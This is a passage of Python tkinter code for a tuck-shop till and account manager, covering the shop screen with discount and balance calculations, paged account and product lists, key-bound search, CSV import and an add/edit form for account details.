ipadx=120, ipady=60)\n\n # hot keys\n self.main_frame.bind_all(1, lambda event: self.setup())\n self.main_frame.bind_all(2, lambda event: self.shop())\n self.main_frame.bind_all(3, lambda event: self.data())\n\n def setup(self):\n \"\"\"populates the main_frame with the two setup options: Accounts and Products\"\"\"\n\n [widget.destroy() for widget in self.main_frame.winfo_children()] # reset main_frame\n\n self.set_nav_btn_cmds(lambda: self.main_menu())\n\n self.title_var.set(\"Setup\")\n self.unbind(title_cut=False)\n\n Grid.columnconfigure(self.main_frame, 0, weight=1), Grid.columnconfigure(self.main_frame, 1, weight=1)\n Grid.columnconfigure(self.main_frame, 2, weight=0)\n\n accounts_btn = Button(self.main_frame, text=\"Accounts\", font=(\"Calibri\", \"32\", \"bold\"), bg='grey60',\n command=lambda: self.accounts())\n accounts_btn.grid(row=0, column=0, ipadx=70, ipady=30)\n products_btn = Button(self.main_frame, text=\"Products\", font=(\"Calibri\", \"32\", \"bold\"), bg='grey60',\n command=lambda: self.products())\n products_btn.grid(row=0, column=1, ipadx=70, ipady=30)\n\n self.main_frame.bind_all(1, lambda event: self.accounts())\n self.main_frame.bind_all(2, lambda event: self.products())\n self.main_frame.bind_all('', lambda event: self.main_menu())\n\n def shop(self, page_num=1, user=list()):\n \"\"\"populates the main_frame with the list of accounts for one to be selected so that a transaction can be made\n on the chosen account\"\"\"\n\n [widget.destroy() for widget in self.main_frame.winfo_children()] # reset main_frame\n\n self.set_nav_btn_cmds(lambda: self.main_menu())\n\n self.title_var.set(\"Shop ({}){}\".format(len(self.table_reader('products')), ' - {}'.format(\n ''.join(self.search).upper()) if len(self.search) != 0 else ''))\n\n page = IntVar()\n page.set(page_num)\n\n font = (\"Calibri\", \"14\", \"bold\")\n\n # frame initialisation\n sales = OrderedDict()\n item_frame = Frame(self.main_frame, bg='red4')\n item_frame.grid(row=0, column=0, sticky=N + E + S + W)\n sale_frame = Frame(self.main_frame, bg='lightblue', width=250)\n sale_frame.grid(row=0, column=1, rowspan=2, sticky=N + E + S + W)\n sale_frame.grid_propagate(False)\n sale_itemised = Frame(sale_frame, bg='lightblue')\n sale_itemised.grid(row=0, column=0, sticky=N + E + S + W)\n sale_totals = Frame(sale_frame, bg='red2')\n sale_totals.grid(row=1, column=0, sticky=N + E + S + W)\n operation_btn_frame = Frame(self.main_frame, bg='green1')\n operation_btn_frame.grid(row=1, column=0, ipady=10, sticky=N + E + S + W)\n\n scrollbar = Scrollbar(sale_itemised)\n scrollbar.grid(row=0, column=1, sticky=N + S)\n listbox = Listbox(sale_itemised, yscrollcommand=scrollbar.set, font=(\"Calibri\", \"18\", \"bold\"))\n listbox.bindtags((listbox, sale_itemised, \"all\"))\n listbox.grid(row=0, column=0, sticky=N + E + S + W)\n scrollbar.config(command=listbox.yview)\n\n Grid.rowconfigure(sale_itemised, 0, weight=1)\n Grid.columnconfigure(sale_itemised, 0, weight=10), Grid.columnconfigure(sale_itemised, 1, weight=0)\n\n total_product_pages = math.ceil(len(self.table_reader('products'))\n / (self.page_items_width * self.page_items_height))\n total_product_pages = 1 if total_product_pages == 0 else total_product_pages\n total_user_pages = math.ceil(len(self.table_reader('accounts'))\n / (self.page_items_width * self.page_items_height))\n total_user_pages = 1 if total_user_pages == 0 else total_user_pages\n\n products = self.table_reader('products', self.get_columns('products')[1])\n\n details_amount_var, details_total_var = list(), list()\n\n for i in range(len(self.table_reader('products'))):\n if len(details_amount_var) < len(self.table_reader('products')):\n details_amount_var.append(StringVar()), details_amount_var[i].set(\"x0\")\n if len(details_total_var) < len(self.table_reader('products')):\n details_total_var.append(StringVar()), details_total_var[i].set(\"£0.00\")\n\n def product_populator():\n \"\"\"page populator specific for the products previewed in the shop page\"\"\"\n [item.destroy() for item in item_frame.grid_slaves()]\n\n self.bind(product_populator, page.get())\n\n offset = (page.get() - 1) * self.page_items_width * self.page_items_height\n\n product_frame, product_lbl, increase_qty, decrease_qty = dict(), dict(), dict(), dict()\n product_details1, product_details2, product_details3 = dict(), dict(), dict()\n m = int()\n\n def qty_changer(no, change):\n if int(details_amount_var[no].get()[1:]) != products[no][7] or products[no][7] == 0:\n details_amount_var[no].set('x{}'.format(int(details_amount_var[no].get()[1:]) + change))\n details_total_var[no].set('£{:.2f}'.format(int(details_amount_var[no].get()[1:]) *\n float(products[no][3])))\n sales_setter(no, int(details_amount_var[no].get()[1:]))\n details_updater()\n else:\n tkinter.messagebox.showinfo(\"Purchase Limit\", \"There is a purchase limit for \\'{}\\' of {}.\".format(\n products[no][1], products[no][7]))\n\n for j in range(self.page_items_height):\n Grid.rowconfigure(item_frame, j, weight=1)\n for k in range(self.page_items_width):\n if j == 0:\n Grid.columnconfigure(item_frame, k, weight=1)\n try:\n products[m + offset] # strangest thing ever! lines occur in the item_frame unless the products\n # array is referenced with the offset provided.\n product_frame[m] = Frame(item_frame, bg='pink', height=100, width=10)\n product_frame[m].grid(row=j, column=k, padx=10, pady=5, sticky=E + W)\n product_frame[m].grid_propagate(False)\n product_lbl[m] = Label(product_frame[m], text=\"{}\".format(products[m + offset][1]), font=font)\n product_lbl[m].grid(row=0, column=1, columnspan=3, sticky=E + W)\n product_details1[m] = Label(product_frame[m], text=\"£{}\".format(\n \"{:.2f}\".format(products[m + offset][3])), font=font, width=6) # must input amounts into\n # database without £ sign and just format it with it each time it is displayed\n product_details1[m].grid(row=1, column=1, sticky=E + W)\n\n product_details2[m] = Label(product_frame[m], textvariable=details_amount_var[m + offset],\n font=font, width=6)\n product_details2[m].grid(row=1, column=2, sticky=E + W)\n product_details3[m] = Label(product_frame[m], textvariable=details_total_var[m + offset],\n font=font, width=7)\n product_details3[m].grid(row=1, column=3, sticky=E + W)\n increase_qty[m] = Button(product_frame[m], text='+', font=font,\n command=lambda offset_m=m + offset: qty_changer(offset_m, 1))\n increase_qty[m].grid(row=0, column=0, sticky=E + W)\n decrease_qty[m] = Button(product_frame[m], text='-', font=font,\n command=lambda offset_m=m + offset: qty_changer(offset_m, -1)\n if float(details_amount_var[offset_m].get()[1:]) > 0 else None)\n decrease_qty[m].grid(row=1, column=0, sticky=E + W)\n\n Grid.columnconfigure(product_frame[m], 0, weight=2)\n Grid.columnconfigure(product_frame[m], 1, weight=1)\n Grid.columnconfigure(product_frame[m], 2, weight=1)\n Grid.columnconfigure(product_frame[m], 3, weight=1)\n Grid.rowconfigure(product_frame[m], 0, weight=1)\n Grid.rowconfigure(product_frame[m], 1, weight=1)\n except IndexError:\n break\n m += 1\n\n def sales_setter(product_no, quantity):\n item = products[product_no]\n sales[item[0]] = \"{0:}x{1:>6} @£{2:.2f} = £{3:.2f}\".format(quantity, item[1], item[3], quantity*item[3])\n if item[5] > 0:\n total = float(sales[item[0]][sales[item[0]].rfind('£') + 1:])\n sales[int(item[0]) + .5] = \"{0:>6}% off = £{1:.2f}\".format(\n item[5], total - (total * float(item[5]) / 100))\n if quantity == 0:\n del sales[item[0]]\n if int(item[0]) + .5 in sales:\n del sales[int(item[0]) + .5]\n\n listbox.delete(0, END)\n for m in sales.values():\n listbox.insert(END, m)\n\n def account_populator():\n \"\"\"page populator specific for the accounts previewed in the shop page\"\"\"\n\n [item.destroy() for item in item_frame.grid_slaves()]\n\n self.bind(account_populator, page.get())\n\n items = self.table_reader('accounts', self.get_columns('accounts')[2], self.get_columns('accounts')[1])\n offset = (page.get() - 1) * self.page_items_width * self.page_items_height\n btn, m = dict(), int()\n\n for j in range(self.page_items_height):\n Grid.rowconfigure(item_frame, j, weight=1)\n for k in range(self.page_items_width):\n if j == 0:\n Grid.columnconfigure(item_frame, k, weight=1)\n try:\n btn[m] = Button(item_frame, text=\"{} {}\".format(items[m + offset][1], items[m + offset][2]),\n font=font, width=6, height=2,\n command=lambda item_=items[m + offset]: self.combine_funcs(\n [user.pop() for _ in range(7)] if user else None, user.extend(item_),\n set_user_details(), details_updater(), page.set(1), self.unbind(),\n self.title_var.set(\"Shop\"), user_select.set(False), product_populator()))\n btn[m].grid(row=j, column=k, padx=15, pady=5, sticky=E + W)\n except IndexError:\n break\n m += 1\n\n def details_updater():\n \"\"\"updates the relevant details previewed at the bottom of the shop page (e.g. New Balance)\"\"\"\n\n total = float()\n for individual_total in details_total_var:\n total += float(individual_total.get()[1:])\n total = round(float(total), 3)\n\n subtotal_var.set(\"Subtotal: £{:.2f}\".format(total))\n user_discount_var.set(\"User Discount: £{:.2f} ({}%)\".format(\n float(subtotal_var.get()[11:]) * (user[4] / 100), user[4])) if user else None\n\n total_discounts = float()\n for key in [key for key in sales.keys() if '.' in str(key)]: # loops through discount keys, adding just\n # the discount values\n total_discounts += float(sales[int(key)][sales[int(key)].rfind('£') + 1:]) \\\n - float(sales[key][sales[key].rfind('£') + 1:])\n total_item_discounts_var.set(\"Total Items Discount: £{:.2f}\".format(total_discounts))\n\n total -= total_discounts\n total = total - total * (user[4] / 100) if user else total\n total_var.set(\"Total: £{:.2f}\".format(total))\n new_balance_var.set(\"New Balance: £{:.2f}\".format(float(user_budget_var.get()[9:]) - total))\n\n product_populator()\n\n user_select = BooleanVar() # for the sake of scrolling pages when selecting user (as opposed to products)\n user_select.set(False)\n\n username_var, user_budget_var, total_var, new_balance_var = StringVar(), StringVar(), StringVar(), StringVar()\n\n username = Button(operation_btn_frame, textvariable=username_var, font=font,\n command=lambda: self.combine_funcs(\n page.set(1), self.unbind(), self.title_var.set('Shop (Select Account)'),\n account_populator(), user_select.set(True)))\n username.grid(row=0, column=0, ipadx=40, ipady=0, pady=0, padx=30, sticky=E + W)\n user_budget_lbl = Label(operation_btn_frame, textvariable=user_budget_var, font=font)\n user_budget_lbl.grid(row=1, column=0, ipadx=40, ipady=0, pady=10, padx=30, sticky=E + W)\n previous_page_btn = Button(operation_btn_frame, text='<-', font=font,\n command=lambda: self.combine_funcs(\n page.set(page.get() - 1), product_populator() if not user_select.get()\n else account_populator())\n if page.get() > 1 else None)\n previous_page_btn.grid(row=0, column=1, rowspan=2, ipadx=15, padx=0)\n purchase_btn = Button(operation_btn_frame, text='Purchase', font=font,\n command=lambda connection, cursor=self.db_opener(\"tuck.db\"): self.combine_funcs(\n cursor.execute(\"UPDATE accounts SET Budget = ? WHERE account_no = ?;\",\n (new_balance_var.get()[14:], user[0])), connection.commit(),\n self.shop(user=[user[0], user[1], user[2], new_balance_var.get()[14:], user[4],\n user[5], user[6]])) if float(new_balance_var.get()[14:]) > 0\n else tkinter.messagebox.showerror(\n \"Not Enough Money\", \"Sorry, you don't have enough money to make this transaction.\"))\n purchase_btn.grid(row=0, column=2, rowspan=2, ipadx=40, ipady=0, pady=0, padx=30, sticky=E + W)\n next_page_btn = Button(operation_btn_frame, text='->', font=font,\n command=lambda: self.combine_funcs(\n self.combine_funcs(page.set(page.get() + 1), product_populator())\n if page.get() < total_product_pages else None)\n if not user_select.get() else self.combine_funcs(\n page.set(page.get() + 1), account_populator())\n if page.get() < total_user_pages else None)\n next_page_btn.grid(row=0, column=3, rowspan=2, ipadx=15, padx=0)\n\n # Sale_totals Frame\n subtotal_var, user_discount_var, total_item_discounts_var, pady = StringVar(), StringVar(), StringVar(), 0\n subtotal_var.set(\"Subtotal: £0.00\")\n user_discount_var.set(\"User Discount: £0.00 (0%)\")\n total_item_discounts_var.set(\"Total Items Discount: £0.00\")\n\n subtotal_lbl = Label(sale_totals, textvariable=subtotal_var, font=font)\n subtotal_lbl.grid(row=0, column=0, pady=pady, sticky=E + W)\n user_discount_lbl = Label(sale_totals, textvariable=user_discount_var, font=font)\n user_discount_lbl.grid(row=1, column=0, sticky=E + W)\n total_item_discounts_lbl = Label(sale_totals, textvariable=total_item_discounts_var, font=font)\n total_item_discounts_lbl.grid(row=2, column=0, pady=pady, sticky=E + W)\n total_lbl = Label(sale_totals, textvariable=total_var, font=font)\n total_lbl.grid(row=3, column=0, ipadx=40, ipady=0, pady=0, padx=0, sticky=E + W)\n new_balance_budget_lbl = Label(sale_totals, textvariable=new_balance_var, font=font)\n new_balance_budget_lbl.grid(row=4, column=0, ipadx=40, ipady=0, pady=pady, padx=0, sticky=E + W)\n\n # row and column configuration\n Grid.rowconfigure(self.main_frame, 0, weight=1000), Grid.rowconfigure(self.main_frame, 1, weight=1)\n Grid.columnconfigure(self.main_frame, 0, weight=5), Grid.columnconfigure(self.main_frame, 1, weight=1)\n Grid.columnconfigure(self.main_frame, 2, weight=0)\n\n Grid.rowconfigure(sale_frame, 0, weight=6), Grid.rowconfigure(sale_frame, 1, weight=1)\n Grid.columnconfigure(sale_frame, 0, weight=1)\n\n Grid.rowconfigure(sale_totals, 0, weight=1), Grid.rowconfigure(sale_totals, 1, weight=1)\n Grid.rowconfigure(sale_totals, 2, weight=1), Grid.rowconfigure(sale_totals, 3, weight=1)\n Grid.rowconfigure(sale_totals, 4, weight=1), Grid.columnconfigure(sale_totals, 0, weight=1)\n\n Grid.rowconfigure(operation_btn_frame, 0, weight=1), Grid.columnconfigure(operation_btn_frame, 0, weight=1)\n Grid.columnconfigure(operation_btn_frame, 1, weight=1), Grid.columnconfigure(operation_btn_frame, 2, weight=1)\n Grid.columnconfigure(operation_btn_frame, 3, weight=1), Grid.columnconfigure(operation_btn_frame, 4, weight=1)\n\n def set_user_details(): # to enable dynamic setting of user details\n username_var.set(\"{} {}\".format(user[1], user[2]))\n user_budget_var.set(\"Budget: £{:.2f}\".format(float(user[3])))\n user_discount_var.set(\"User Discount: £{:.2f} ({}%)\".format(float(subtotal_var.get()[11:])\n * (user[4] / 100), user[4]))\n\n username_var.set(\"Select User\"), user_budget_var.set(\"Budget: £0.00\")\n if user:\n set_user_details()\n total_var.set(\"Total: £0.00\")\n new_balance_var.set(\"New Balance: £{:.2f}\".format(float(user_budget_var.get()[9:])))\n\n self.main_frame.bind_all('', lambda event: self.main_menu())\n\n def data(self):\n \"\"\"Still In Dev\"\"\"\n\n [widget.destroy() for widget in self.main_frame.winfo_children()] # reset main_frame\n\n self.set_nav_btn_cmds(lambda: self.main_menu())\n\n self.title_var.set(\"Data\")\n\n self.unbind(title_cut=False)\n self.main_frame.bind_all('', lambda event: self.main_menu())\n\n def accounts(self, page_num=1):\n \"\"\"provides the appropriate data for the setup_window_generator to generate the accounts window (see the\n generator itself for functionality)\"\"\"\n\n [widget.destroy() for widget in self.main_frame.winfo_children()] # reset main_frame\n\n self.setup_window_generator(page_num, 'accounts', self.item_form, self.table_reader, self.accounts)\n\n def setup_window_generator(self, page_num, table, add_command, page_command, caller):\n \"\"\"populates the main_frame with items along with buttons to: import new accounts, edit current account\n information, add new accounts and delete accounts as well as page interaction (moving between pages)\"\"\"\n\n self.set_nav_btn_cmds(lambda: self.setup())\n\n self.title_var.set(\"{} ({}){}\".format(table.capitalize(), len(self.table_reader(table)),\n ' - {}'.format(''.join(self.search).upper())\n if len(self.search) != 0 else ''))\n\n total_items = len(self.table_reader(table))\n total_pages = math.ceil(total_items / (self.page_items_width * self.page_items_height))\n total_pages = 1 if total_pages == 0 else total_pages\n\n page = IntVar()\n page.set(page_num)\n\n item_frame, operation_btn_frame = Frame(self.main_frame, bg='red1'), Frame(self.main_frame, bg='green1')\n item_frame.grid(row=0, column=0, sticky=N + E + S + W)\n operation_btn_frame.grid(row=1, column=0, sticky=N + E + S + W)\n\n Grid.rowconfigure(self.main_frame, 0, weight=1000), Grid.rowconfigure(self.main_frame, 1, weight=1)\n Grid.columnconfigure(self.main_frame, 1, weight=0), Grid.columnconfigure(self.main_frame, 2, weight=0)\n Grid.columnconfigure(self.main_frame, 3, weight=0)\n\n import_btn = Button(operation_btn_frame, text='Import', font=(\"Calibri\", \"14\", \"bold\"))\n import_btn.grid(row=0, column=0, ipadx=40, ipady=0, pady=20, padx=30, sticky=E + W)\n add_btn = Button(operation_btn_frame, text='Add', font=(\"Calibri\", \"14\", \"bold\"),\n command=lambda page_=page.get(): add_command(0, page_, table, caller))\n add_btn.grid(row=0, column=1, ipadx=40, ipady=0, pady=20, padx=30, sticky=E + W)\n previous_page_btn = Button(operation_btn_frame, text='Previous Page', font=(\"Calibri\", \"14\", \"bold\"),\n command=lambda: self.combine_funcs(\n self.page_populator(item_frame, page_command(\n table, self.get_columns(table)[2]\n if table == 'accounts' else self.get_columns(table)[1],\n self.get_columns(table)[1] if table == 'accounts' else None),\n page.get() - 1, table, caller),\n page.set(page.get() - 1)) if page.get() > 1 else NONE)\n previous_page_btn.grid(row=0, column=2, ipadx=40, ipady=0, pady=20, padx=30, sticky=E + W)\n page_no_lbl = Label(operation_btn_frame, textvariable=page)\n page_no_lbl.grid(row=0, column=3, ipadx=40, ipady=0, pady=20, padx=30, sticky=E + W)\n page_no_of_lbl = Label(operation_btn_frame, text=\"of {}\".format(total_pages))\n page_no_of_lbl.grid(row=0, column=4, ipadx=40, ipady=0, pady=20, padx=30, sticky=E + W)\n next_page_btn = Button(operation_btn_frame, text='Next Page', font=(\"Calibri\", \"14\", \"bold\"),\n command=lambda page_=page.get(): self.combine_funcs(\n self.page_populator(item_frame, page_command(\n table, self.get_columns(table)[2]\n if table == 'accounts' else self.get_columns(table)[1],\n self.get_columns(table)[1] if table == 'accounts' else None),\n page.get() + 1, table, caller),\n page.set(page.get() + 1)) if page.get() < total_pages\n else NONE)\n next_page_btn.grid(row=0, column=5, ipadx=40, ipady=0, pady=20, padx=30, sticky=E + W)\n\n Grid.rowconfigure(operation_btn_frame, 0, weight=1)\n Grid.columnconfigure(operation_btn_frame, 0, weight=2), Grid.columnconfigure(operation_btn_frame, 1, weight=2)\n Grid.columnconfigure(operation_btn_frame, 2, weight=2), Grid.columnconfigure(operation_btn_frame, 3, weight=1)\n Grid.columnconfigure(operation_btn_frame, 4, weight=1), Grid.columnconfigure(operation_btn_frame, 5, weight=2)\n\n path, initial_dir, title_1 = StringVar(), \"%documents%\", \"Select the File to Import From\"\n file_types = ('csv files only', '*.csv')\n import_btn.config(command=lambda: self.combine_funcs(\n self.importer(tkinter.filedialog.askopenfilename(initialdir=initial_dir, title=title_1,\n filetypes=[file_types]), table), caller(1)))\n \n self.page_populator(item_frame, page_command(table, self.get_columns(table)[2]\n if table == 'accounts' else self.get_columns(table)[1],\n self.get_columns(table)[1] if table == 'accounts' else None),\n page.get(), table, caller)\n\n self.delete.clear()\n\n self.bind(caller, page.get())\n self.main_frame.bind_all('', lambda event: self.setup())\n\n def bind(self, caller, page):\n \"\"\"binds all relevant characters for the sake of name searching\"\"\"\n\n if len(self.search) < 30: # Until widget size is made more dynamic or is changed permanently buttons in the\n # top_bar will not fit properly if search query is larger than 30 chars\n for letter in self.letters:\n self.main_frame.bind_all(\n letter, lambda event, title=self.title_var.get(): self.combine_funcs(\n self.search.append(event.keysym),\n self.title_var.set('{} - {}'.format(title[:title.find('-') - 1] if '-' in title else title,\n ''.join(self.search).upper())), caller(page)\n if caller.__name__ not in ['product_populator', 'account_populator'] else caller()))\n for number in self.numbers:\n self.main_frame.bind_all(\n number, lambda event, title=self.title_var.get(): self.combine_funcs(\n self.search.append(event.keysym),\n self.title_var.set('{} - {}'.format(title[:title.find('-') - 1] if '-' in title else title,\n ''.join(self.search).upper())), caller(page)\n if caller.__name__ not in ['product_populator', 'account_populator'] else caller()))\n self.main_frame.bind_all('', lambda event, title=self.title_var.get(): self.combine_funcs(\n self.search.append(' '),\n self.title_var.set('{} - {}'.format(title[:title.find('-') - 1] if '-' in title else title,\n ''.join(self.search).upper())), caller(page)\n if caller.__name__ not in ['product_populator', 'account_populator'] else caller()))\n\n else:\n self.unbind(keep_search=True)\n\n if len(self.search) != 0:\n self.main_frame.bind_all('', lambda event, title=self.title_var.get(): self.combine_funcs(\n self.search.pop(),\n self.title_var.set('{} - {}'.format(title[:title.find('-') - 1] if '-' in title else title,\n ''.join(self.search).upper())), caller(page)\n if caller.__name__ not in ['product_populator', 'account_populator'] else caller()))\n else:\n self.main_frame.unbind_all('')\n\n def unbind(self, keep_search=False, title_cut=True):\n \"\"\"unbinds all keys used for name searching\"\"\"\n\n if title_cut:\n self.title_var.set(self.title_var.get()[:self.title_var.get().find('-') - 1])\n for letter in self.letters:\n self.main_frame.unbind_all(letter)\n for number in self.numbers:\n self.main_frame.unbind_all(number)\n self.main_frame.unbind_all('')\n self.main_frame.unbind_all('')\n if not keep_search:\n self.search = list()\n\n def item_form(self, action, page_num, table, caller, info=None):\n \"\"\"creates form for adding (action=0) or editing (action=1) an item\"\"\"\n\n [widget.destroy() for widget in self.main_frame.winfo_children()]\n\n self.set_nav_btn_cmds(lambda: caller(page_num))\n\n center_frame = Frame(self.main_frame, bg='grey50', width=1200, height=100)\n center_frame.grid_propagate(False)\n\n self.unbind()\n self.main_frame.bind_all('', lambda event: caller(page_num))\n\n # add scroll buttons if editing\n if action == 0:\n action_ = \"Add\"\n center_frame.grid(row=0, column=0, sticky=N+S)\n Grid.columnconfigure(self.main_frame, 0, weight=1)\n else:\n action_ = \"Edit\"\n\n prev_account, next_account, page_num_prev, page_num_next = list(), list(), int(), int()\n\n prev_account_btn = Button(self.main_frame, text=\"<-\", width=4, font=(\"Calibri\", \"28\", \"bold\"),\n command=lambda: self.item_form(1, page_num_prev, table, caller, prev_account))\n prev_account_btn.grid(row=0, column=0, padx=5)\n next_account_btn = Button(self.main_frame, text=\"->\", width=4, font=(\"Calibri\", \"28\", \"bold\"),\n command=lambda: self.item_form(1, page_num_next, table, caller, next_account))\n next_account_btn.grid(row=0, column=2, padx=5)\n\n items = self.table_reader(table, 'l_name', 'f_name') if table == 'accounts' \\\n else self.table_reader(table, 'p_name')\n\n for i in range(len(items)):\n if items[i][0] == info[0] and items[i][1] == info[1]:\n if i == 0:\n prev_account_btn.config(command=lambda: None, bg='grey45')\n else:\n prev_account = items[i-1]\n page_num_prev = math.ceil(i/(self.page_items_width * self.page_items_height))\n if i == len(items) - 1:\n next_account_btn.config(command=lambda: None, bg='grey45')\n else:\n next_account = items[i+1]\n page_num_next = math.ceil((i+2)/(self.page_items_width * self.page_items_height))\n\n center_frame.grid(row=0, column=1, pady=5, sticky=N+S)\n Grid.columnconfigure(self.main_frame, 0, weight=1)\n Grid.columnconfigure(self.main_frame, 1, weight=1)\n Grid.columnconfigure(self.main_frame, 2, weight=1)\n\n self.title_var.set(\"{} - {}\".format(table.capitalize(), action_))\n\n def time_period_frame_setter(frame, entry, coder, *vars_, delete=False):\n \"\"\"adds necessary buttons, entries and labels for time bound details such as an offer\"\"\"\n\n def btn_1_click():\n btn_1.grid_forget(),\n btn_2.grid(row=0, column=1, padx=padx, pady=pady, ipadx=ipadx, ipady=ipady, sticky=E + W),\n btn_3.grid(row=0, column=2, padx=padx, pady=pady, ipadx=ipadx, ipady=ipady, sticky=E + W),\n btn_4.grid(row=0, column=3, padx=padx, pady=pady, ipadx=ipadx, ipady=ipady, sticky=E + W),\n Grid.columnconfigure(frame, 2, weight=1), Grid.columnconfigure(frame, 3, weight=1)\n\n def btn_2_click():\n time_codes[coder].set(1), btn_2.destroy(), btn_3.destroy(), btn_4.destroy(),\n entry.grid(row=0, column=1, padx=(padx, 0), sticky=E),\n [Grid.columnconfigure(frame, k, weight=0) for k in range(1, 4)],\n Grid.columnconfigure(frame, 2, weight=1),\n Label(frame, text='to be applied indefinitely', font=font2,\n bg=lbls_colour).grid(row=0, column=2, sticky=W),\n btn_1.grid(row=0, column=3, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=W),\n btn_1.config(text='DELETE', width=int(width / 3), bg='red',\n command=lambda: self.combine_funcs(\n [widget.grid_forget() for widget in frame.winfo_children()[2:]],\n frame.winfo_children()[0].grid_forget(), # this is the frame inside of 'frame'\n [Grid.columnconfigure(frame, k + 1, weight=0) for k in range(3)],\n time_period_frame_setter(frame, entry, coder, *vars_, delete=True)))\n\n def btn_3_click():\n date_entry = Frame(frame, bg=frames_colour, height=35, width=130)\n time_codes[coder].set(2), btn_2.destroy(), btn_3.destroy(), btn_4.destroy(),\n entry.grid(row=0, column=1, padx=(padx, 0), sticky=E),\n [Grid.columnconfigure(frame, k, weight=0) for k in range(1, 4)],\n Grid.columnconfigure(frame, 4, weight=1),\n Label(frame, text='until', font=font2, bg=lbls_colour).grid(row=0, column=2, padx=0),\n date_entry.grid(row=0, column=3), date_entry.grid_propagate(False),\n\n date_picker.Datepicker(date_entry, datevar=vars_[0], font=font2, entrywidth=10,\n entrystyle=\"EntryStyle.TEntry\").grid(row=0, column=0, padx=2),\n btn_1.grid(row=0, column=4, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E),\n btn_1.config(text='DELETE', width=int(width / 3), bg='red',\n command=lambda: self.combine_funcs(\n [widget.grid_forget() for widget in frame.winfo_children()[2:]],\n frame.winfo_children()[0].grid_forget(), # this is the frame inside of 'frame'\n [Grid.columnconfigure(frame, k + 1, weight=0) for k in range(1, 5)],\n time_period_frame_setter(frame, entry, coder, *vars_, delete=True)))\n\n def btn_4_click():\n vars_[1].set(\"week(s)\")\n opt_menu = OptionMenu(frame, vars_[1], \"purchase(s)\", \"hour(s)\", \"day(s)\", \"week(s)\", \"month(s)\",\n \"year(s)\")\n opt_menu.config(font=font2, bg=entries_colour)\n opt_menu.nametowidget(opt_menu.menuname).configure(font=font2, bg=entries_colour)\n time_codes[coder].set(3), btn_2.destroy(), btn_3.destroy(), btn_4.destroy(),\n entry.grid(row=0, column=1, padx=(padx, 0), sticky=E),\n [Grid.columnconfigure(frame, k, weight=0) for k in range(1, 4)],\n Grid.columnconfigure(frame, 5, weight=1),\n Label(frame, text='for', font=font2, bg=lbls_colour).grid(row=0, column=2),\n Entry(frame, font=font2, bg=entries_colour, width=int(width / 3), textvariable=vars_[0])\\\n .grid(row=0, column=3, pady=pady * 3, sticky=N + S),\n opt_menu.grid(row=0, column=4),\n btn_1.grid(row=0, column=5, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E),\n btn_1.config(text='DELETE', width=int(width / 3), bg='red',\n command=lambda: self.combine_funcs(\n [widget.grid_forget() for widget in frame.winfo_children()[2:]],\n frame.winfo_children()[0].grid_forget(), # this is the frame inside of\n # 'frame'\n [Grid.columnconfigure(frame, k + 1, weight=0) for k in range(1, 6)],\n time_period_frame_setter(frame, entry, coder, *vars_, delete=True)))\n\n btn_1 = Button(frame, text='Add', font=font2, bg=btns_colour, command=lambda: btn_1_click())\n btn_1.grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n Grid.columnconfigure(frame, 1, weight=1)\n\n btn_2 = Button(frame, text='INDEFINITELY', font=font2, width=width, bg=btns_colour,\n command=lambda: btn_2_click())\n\n btn_3 = Button(frame, text='UNTIL GIVEN DATE', font=font2, width=width, bg=btns_colour,\n command=lambda: btn_3_click())\n\n btn_4 = Button(frame, text='FOR GIVEN TIME', width=width, wraplength=230, font=font2, bg=btns_colour,\n command=lambda: btn_4_click())\n\n if info is not None and not delete:\n btn_1_click() if time_codes[coder].get() != 0 else None\n btn_2_click() if time_codes[coder].get() == 1 else btn_3_click() if time_codes[coder].get() == 2 \\\n else btn_4_click() if time_codes[coder].get() == 3 else None\n\n font1, font2 = (\"Calibri\", \"18\", \"bold\"), (\"Calibri\", \"18\")\n ipadx, ipady, padx, pady, width = 10, 8, 20, 5, 18\n lbl_titles_colour, entries_colour, lbls_colour, btns_colour, frames_colour = 'grey70', 'grey70', 'grey70', \\\n 'green3', 'grey70'\n lbl, data, var, time_codes, i = list(), list(), list(), list(), int()\n [time_codes.append(IntVar()) for _ in range(3)]\n [var.append(StringVar()) for _ in range(len(self.get_columns(table)[1:-1]) - len(time_codes))]\n\n if info is not None:\n if table == \"accounts\":\n i_ = 1\n for j in range(1, len(var) + len(time_codes) + 1):\n column_name = self.get_columns(table)[j]\n if column_name in ['discount_1', 'spending_limit_1', 'sub_zero_allowance_1']:\n time_codes[i_ - 1].set(info[j])\n i_ += 1\n else:\n if column_name in ['f_name', 'l_name']:\n var[j - i_].set(info[j])\n elif column_name in ['budget', 'discount_3', 'spending_limit_2', 'sub_zero_allowance_2']:\n try:\n var[j - i_].set(\"{:.2f}\".format(float(info[j])))\n except ValueError: # in case of empty string (can't float nothing)\n var[j - i_].set(\"{:.2f}\".format(float()))\n elif column_name == 'discount_2':\n var[j - i_].set(info[j] if info[j] in ['£', '%'] else '%')\n else:\n var[j - i_].set(info[j])\n else: # table == \"products\"\n pass\n\n def is_number(string):\n \"\"\"checks if str can be converted to float\"\"\"\n try:\n float(string)\n return True\n except ValueError:\n return False\n\n if table == 'accounts': # populate form with relevant fields\n frames = list()\n for i in range(7): # create frames for form fields\n frames.append(Frame(center_frame, bg=frames_colour, height=60, width=400))\n frames[i].grid(row=i, column=0, columnspan=2, pady=pady, sticky=E + W)\n\n i += 1\n Label(frames[0], text='First Name', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n Entry(frames[0], textvariable=var[0], font=font2, width=width*3, bg=entries_colour) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n Grid.columnconfigure(frames[0], 1, weight=1)\n\n Label(frames[1], text='Last Name', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n Entry(frames[1], textvariable=var[1], font=font2, width=width*3, bg=entries_colour) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n Grid.columnconfigure(frames[1], 1, weight=1)\n\n def top_up_btn_set():\n \"\"\"sets the top up btn\"\"\" # used so that the top up btn can be reset once topped up\n top_up_btn = Button(\n frames[2], text='Top Up', font=font2, width=width*2, bg=btns_colour,\n command=lambda: self.combine_funcs(\n 